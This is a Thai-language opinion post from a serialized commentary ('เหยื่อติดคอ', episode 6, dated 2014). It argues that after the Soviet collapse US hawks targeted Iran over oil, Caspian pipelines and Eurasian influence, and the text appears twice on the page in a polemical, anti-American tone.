    การล่มสลายของสหภาพโซเวียต ไม่ได้นำความสะใจมาให้อเมริกาแต่อย่างเดียว น่าจะนำความวุ่นวายใจมาให้ด้วย หลังสหภาพโซเวียตล่ม กลับมีการเกิดใหม่ของรัฐเล็กรัฐน้อย ที่เคยอยู่ในอ้อมแขนของสหภาพโซเวียต ทยอยออกมาตั้งเป็นรัฐอิสระ รัฐเล็กๆเหล่านี้เต็มไปด้วยแหล่งทรัพยากร จิ้มไปตรงไหน ไม่น้ำมันผุดก็แก๊สพุ่ง แบบนี้นักล่าต่างๆจะอดใจไหวอย่างไร แต่คราวนี้พวกที่จ้องกันน้ำลายไหลไม่ได้มีแต่นักล่าตะวันตก ประเทศที่เพิ่งโตเช่น จีน และแม้แต่เจ้าของเก่าเช่นรัสเซีย ก็ออกอาการ

    นาย Zbigniew Brzezinski ที่ปรึกษาใหญ่ ออกมากระตุกแขนอเมริกา อย่าลืมนะ รางวัลใหญ่คือ Eurasia ปล่อยให้หลุดมือไม่ได้

    อิหร่านที่มีเขตแดนติดอยู่กับสหภาพโซเวียตเดิม ยาวพันกว่ากิโลเมตร เป็นเพื่อนบ้านกันมากับรัฐเล็ก รัฐน้อยแถบนั้น ผูกพันกันทั้งด้านประวัติศาสตร์ ภูมิศาสตร์ วัฒนธรรม และภาษา จะปล่อยให้คนแปลกหน้าต่างถิ่น เดินเข้าไปชิงตัดหน้าอย่างนั้นหรือ อิหร่านเริ่มเสนอโครงการท่อส่งสามัคคี ยาวตั้งแต่ Caspian Sea จากทางเหนือลงใต้ไปถึงอ่าว Persia ถ้าข้อเสนอของอิหร่านเกิดขึ้น ความฝันที่จะชิงรางวัลใหญ่ของอเมริกาก็คงริบหรี่ แล้วจะปล่อยไปได้อย่างไร
    อเมริกาพยายามคิดวิธีการที่จะจัดการกับอิหร่าน สมัยรัฐบาล Clinton เขาบอกว่า ไม่ต้องยกทัพไปขยี้อิหร่านหรอก อิหร่านไม่ใช่คู่แข่งของเรา เราเอาการค้านำหน้า เป็นการค้าเสรีให้มันทั่วโลก พวกเขาไม่ฉลาดเท่าเราหรอก เราเปิดให้ทุนเข้าไปไม่เท่าไร เดี๋ยวเราก็กินเขาได้หมดเองน่า เออ! มันก็ได้ผลหลายที่ แต่ก็ไม่ใช่ว่าทุกแห่งจะคี้ยวได้ง่าย แต่สายเหยี่ยวของอเมริกาไม่เห็นด้วย เขายืนยันว่าอิหร่านเป็นเป้าสำคัญในตะวันออกกลาง ถ้าเราปล่อยให้อิหร่านโตไปเรื่อยๆ และไม่รู้ว่าต่อไปอิหร่านจะหันหน้าไปซบใคร สู้ตัดตอนมันไปเสียก่อนไม่ดีกว่าหรือ

    เมื่อ George Bush ได้เป็นประธานาธิบดีใน ค.ศ.2000 หลังจากเกิดเหตุการณ์ 11 กันยา สายเหยี่ยวได้โอกาส (หรือสร้างโอกาส..!?) ประกาศว่า เราต้องจัดระเบียบโลกใหม่เกี่ยวกับเรื่องการก่อการร้าย แล้วอิหร่านและอิรักก็ได้รับเกียรติเป็นหนึ่งในประเทศเป้าหมาย ที่อเมริกาจะต้อง “จัดการ” รุ่นแรก

    รัฐมนตรีกลาโหม Donald Rumsfeld และผู้ช่วยตัวแสบ Paul Wolfowitz บอกว่าเราต้องสูบพวกนี้ออกมาให้หมดจากบริเวณตะวันออกกลาง “draining the swamp” แล้วพ่วงเอาผู้ปกครองอิรัก อิหร่าน และซีเรียไปด้วย เพราะพวกนี้แหละที่เป็นตัวขวางไม่ให้อเมริกาสยายปีกการล่าเหยื่อในตะวันออกกลาง

    การสูบน้ำออกจากหนอง แบ่งเป็น 3 ขั้นตอน เริ่มแรกเมื่อเดือนตุลาคม ค.ศ.2001 เมื่ออเมริกาทิ้งบอมบ์อาฟกานิสถาน และล้มรัฐบาลตาลีบัน (ซึ่งสร้างมากับมือ) อิรักเป็นขั้นตอนต่อไป แม้ Saddam จะไม่เป็นอิสลาม และไม่ได้เป็นพวกอัลกออิดะห์ แต่การอยู่ของ Saddam ทำให้อเมริการำคาญใจ เพราะเกะกะขวางทางการไปเอาน้ำมันในอิรัก ขั้นตอนสุดท้ายคืออิหร่าน ซึ่งไม่เกี่ยวกับรายการ 11 กันยา แถมยังยอมให้อเมริกาเข้ามาในเขตแดนของอิหร่าน ตอนกวาดพวกตาลีบันด้วย

    แต่อิหร่านเป็นแม่พิมพ์ของพวกอิสลามเคร่งครัด ถ้าแม่พิมพ์ยังอยู่ดี เดี๋ยวก็มีการถ่ายแบบกันไปทั่วตะวันออกกลาง อเมริการับไม่ได้ แต่ที่สำคัญ น่าจะเป็นข่าวที่เริ่มกระจายออกไปว่า อิหร่านก็คิดมีเพื่อน และเพื่อนที่อิหร่านอยากคบคือรัสเซียและจีน ซึ่งยืนตรงกันข้ามกับอเมริกา โดยเฉพาะรัสเซีย และจากสาเหตุสุดท้ายนี้ อิหร่านก็ได้ถูกเลื่อนอันดับอย่างรวดเร็ว โดยรัฐบาล Bush เป็นเป้าหมายอันดับหนึ่งที่จะต้องถูกจัดการสังเวยความกระหายน้ำมันและอำนาจ บวกความหมั่นไส้ที่ไม่รู้จักเลือกคบเพื่อน มองข้ามหัวอเมริกาอย่างท้าท้าย

    สวัสดีครับ
    คนเล่านิทาน
    24 กันยายน 2557
    เหยื่อติดคอ ตอนที่ 6 นิทานเรื่องจริง เรื่อง “เหยื่อติดคอ” ตอนที่ 6 สงครามอิรักอิหร่าน ที่ถูกชักใยโดยอเมริกา ทำให้ชาวอิหร่านตายไปไม่น้อยกว่า 300,000 คน และชีวิตชาวอิรักอีกประมาณ 100,000 คน มีคนเจ็บประเทศละไม่น้อยกว่า 700,000 คน ส่วนการรบในอาฟกานิสถาน ระหว่าง ค.ศ.1979-1989 ชีวิตของคนอาฟกันต้องเสียไปประมาณ 1 ล้านคน (รวมทั้งทหารของสหภาพโซเวียตอีก 15,000 นาย) 1 ใน 3 ของชาวอาฟกันกลายเป็นผู้ลี้ภัยอาศัยอยู่ตามเต้นท์ และมันกลายเป็นการเริ่มต้นใหม่ของการต่อต้านการล่าอาณานิคม คราวนี้ไม่ใช่นักล่าจากเกาะใหญ่เท่าปลายนิ้วก้อยของเท้าซ้าย แต่เป็นอเมริกา นักล่าหน้าใหม่ ใจเหี้ยมโหด จากแผ่นดินใหญ่ที่แย่งชิงมาจากอินเดียนแดง เป็นวีรกรรมที่ต้องบันทึกไว้ เมื่อสหภาพโซเวียตล้มครืนในปี ค.ศ.1991 อเมริกากระหยิ่ม คิดว่าเส้นทางก้าวสู่การเป็นหมายเลขหนึ่งของโลกสะดวกโล่ง เมื่อคู่แข่งคนสำคัญถูกเขี่ยตกไปจากลู่แข่ง มันอาจจะเป็นการตกจากลู่แข่งเป็นการชั่วคราวเท่านั้น แต่ตอนนั้นอเมริกาไม่ได้คิดอย่างนั้น ความเกลียด ความสะใจคงจะทำให้มองภาพไม่ชัด อเมริกาคิดว่านี่เป็นโอกาสเหมาะ ที่จะสยายปีกมาทางตะวันออกกลาง และยิ่งเมื่อ Khomeini ได้ถึงแก่กรรมไปแล้ว อิหร่านคงไม่แกร่งอย่างเดิม อเมริกาไม่จำเป็นต้อง “เลี้ยง” อิหร่านอีกต่อไป ยักษ์ล้มไปแล้ว ยันต์กันยักษ์ไม่มีความหมายเหมือนเก่า แต่ดูเหมือนอเมริกาจะอ่านไม่ขาด สงครามอิรัก อิหร่าน กลับทำให้การปกครองของ Khomeini เข้มแข็งขึ้น ชาวตะวันออกเห็นความอึดและเด็ดขาดของ Khomeini ชัดเจน มีการรวมตัวกันมากขึ้น เพราะเห็นเป้าหมายชัดเจน ยิ่งเมื่อสหภาพโซเวียตที่ถูกมองว่าเป็นคู่แข่งคนเดียว ที่พอจะต่อกรกับอเมริกาได้ถูกน๊อคนับ 10 กลุ่มอิสลามกลับคิดรวมตัวกัน เพื่อป้องกันการครอบครองของอเมริกา และเริ่มเข้าไปมีส่วนในการเมืองในภูมิภาคของตนเอง นอกจากนั้น การที่อเมริกาอุดหนุนให้อาวุธ และทำการฝึกให้กลุ่มอาฟกันและ Mujahadeen เพื่อให้ไปโซ้ยกับรัสเซียแทนตนนั้น ทำให้กลุ่มอิสลามติดอาวุธพวกนี้ยิ่งฮึกเหิม พวกเขาเชื่อว่า เมื่อล้มยักษ์ได้ตัวหนึ่ง (สหภาพโซเวียต) ทำไมจะล้มยักษ์ตัวอื่นๆอีกไม่ได้ และเมื่อเริ่ม ค.ศ.1990 เป็นต้นมา กลุ่มอิสลามหัวรุนแรงก็ดูเหมือนจะขยายใหญ่ขึ้นเรื่อยๆ และกลายเป็นเหยื่อที่มีก้าง ติดเสียบค้างอยู่กลางคอของอเมริกา การล่มสลายของสหภาพโซเวียต ไม่ได้นำความสะใจมาให้อเมริกาแต่อย่างเดียว น่าจะนำความวุ่นวายใจมาให้ด้วย หลังสหภาพโซเวียตล่ม กลับมีการเกิดใหม่ของรัฐเล็กรัฐน้อย ที่เคยอยู่ในอ้อมแขนของสหภาพโซเวียต ทยอยออกมาตั้งเป็นรัฐอิสระ รัฐเล็กๆเหล่านี้เต็มไปด้วยแหล่งทรัพยากร จิ้มไปตรงไหน ไม่น้ำมันผุดก็แก๊สพุ่ง แบบนี้นักล่าต่างๆจะอดใจไหวอย่างไร แต่คราวนี้พวกที่จ้องกันน้ำลายไหลไม่ได้มีแต่นักล่าตะวันตก ประเทศที่เพิ่งโตเช่น จีน และแม้แต่เจ้าของเก่าเช่นรัสเซีย ก็ออกอาการ นาย Zbigniew Brzezinski ที่ปรึกษาใหญ่ ออกมากระตุกแขนอเมริกา อย่าลืมนะ รางวัลใหญ่คือ Eurasia ปล่อยให้หลุดมือไม่ได้ อิหร่านที่มีเขตแดนติดอยู่กับสหภาพโซเวียตเดิม ยาวพันกว่ากิโลเมตร เป็นเพื่อนบ้านกันมากับรัฐเล็ก รัฐน้อยแถบนั้น ผูกพันกันทั้งด้านประวัติศาสตร์ ภูมิศาสตร์ วัฒนธรรม และภาษา จะปล่อยให้คนแปลกหน้าต่างถิ่น เดินเข้าไปชิงตัดหน้าอย่างนั้นหรือ อิหร่านเริ่มเสนอโครงการท่อส่งสามัคคี ยาวตั้งแต่ Caspian Sea จากทางเหนือลงใต้ไปถึงอ่าว Persia ถ้าข้อเสนอของอิหร่านเกิดขึ้น ความฝันที่จะชิงรางวัลใหญ่ของอเมริกาก็คงริบหรี่ แล้วจะปล่อยไปได้อย่างไร อเมริกาพยายามคิดวิธีการที่จะจัดการกับอิหร่าน สมัยรัฐบาล Clinton เขาบอกว่า ไม่ต้องยกทัพไปขยี้อิหร่านหรอก อิหร่านไม่ใช่คู่แข่งของเรา เราเอาการค้านำหน้า เป็นการค้าเสรีให้มันทั่วโลก พวกเขาไม่ฉลาดเท่าเราหรอก เราเปิดให้ทุนเข้าไปไม่เท่าไร เดี๋ยวเราก็กินเขาได้หมดเองน่า เออ! มันก็ได้ผลหลายที่ แต่ก็ไม่ใช่ว่าทุกแห่งจะคี้ยวได้ง่าย แต่สายเหยี่ยวของอเมริกาไม่เห็นด้วย เขายืนยันว่าอิหร่านเป็นเป้าสำคัญในตะวันออกกลาง ถ้าเราปล่อยให้อิหร่านโตไปเรื่อยๆ และไม่รู้ว่าต่อไปอิหร่านจะหันหน้าไปซบใคร สู้ตัดตอนมันไปเสียก่อนไม่ดีกว่าหรือ เมื่อ George Bush ได้เป็นประธานาธิบดีใน ค.ศ.2000 หลังจากเกิดเหตุการณ์ 11 กันยา สายเหยี่ยวได้โอกาส (หรือสร้างโอกาส..!?) ประกาศว่า เราต้องจัดระเบียบโลกใหม่เกี่ยวกับเรื่องการก่อการร้าย แล้วอิหร่านและอิรักก็ได้รับเกียรติเป็นหนึ่งในประเทศเป้าหมาย ที่อเมริกาจะต้อง “จัดการ” รุ่นแรก รัฐมนตรีกลาโหม Donald Rumsfeld และผู้ช่วยตัวแสบ Paul Wolfowitz บอกว่าเราต้องสูบพวกนี้ออกมาให้หมดจากบริเวณตะวันออกกลาง “draining the swamp” แล้วพ่วงเอาผู้ปกครองอิรัก อิหร่าน และซีเรียไปด้วย เพราะพวกนี้แหละที่เป็นตัวขวางไม่ให้อเมริกาสยายปีกการล่าเหยื่อในตะวันออกกลาง การสูบน้ำออกจากหนอง แบ่งเป็น 3 ขั้นตอน เริ่มแรกเมื่อเดือนตุลาคม ค.ศ.2001 เมื่ออเมริกาทิ้งบอมบ์อาฟกานิสถาน และล้มรัฐบาลตาลีบัน (ซึ่งสร้างมากับมือ) อิรักเป็นขั้นตอนต่อไป แม้ Saddam จะไม่เป็นอิสลาม และไม่ได้เป็นพวกอัลกออิดะห์ แต่การอยู่ของ Saddam ทำให้อเมริการำคาญใจ เพราะเกะกะขวางทางการไปเอาน้ำมันในอิรัก ขั้นตอนสุดท้ายคืออิหร่าน ซึ่งไม่เกี่ยวกับรายการ 11 กันยา แถมยังยอมให้อเมริกาเข้ามาในเขตแดนของอิหร่าน ตอนกวาดพวกตาลีบันด้วย แต่อิหร่านเป็นแม่พิมพ์ของพวกอิสลามเคร่งครัด ถ้าแม่พิมพ์ยังอยู่ดี เดี๋ยวก็มีการถ่ายแบบกันไปทั่วตะวันออกกลาง อเมริการับไม่ได้ แต่ที่สำคัญ น่าจะเป็นข่าวที่เริ่มกระจายออกไปว่า อิหร่านก็คิดมีเพื่อน และเพื่อนที่อิหร่านอยากคบคือรัสเซียและจีน ซึ่งยืนตรงกันข้ามกับอเมริกา โดยเฉพาะรัสเซีย และจากสาเหตุสุดท้ายนี้ อิหร่านก็ได้ถูกเลื่อนอันดับอย่างรวดเร็ว โดยรัฐบาล Bush เป็นเป้าหมายอันดับหนึ่งที่จะต้องถูกจัดการสังเวยความกระหายน้ำมันและอำนาจ บวกความหมั่นไส้ที่ไม่รู้จักเลือกคบเพื่อน มองข้ามหัวอเมริกาอย่างท้าท้าย สวัสดีครับ คนเล่านิทาน 24 กันยายน 2557
    0 Comments 0 Shares 91 Views 0 Reviews
More Results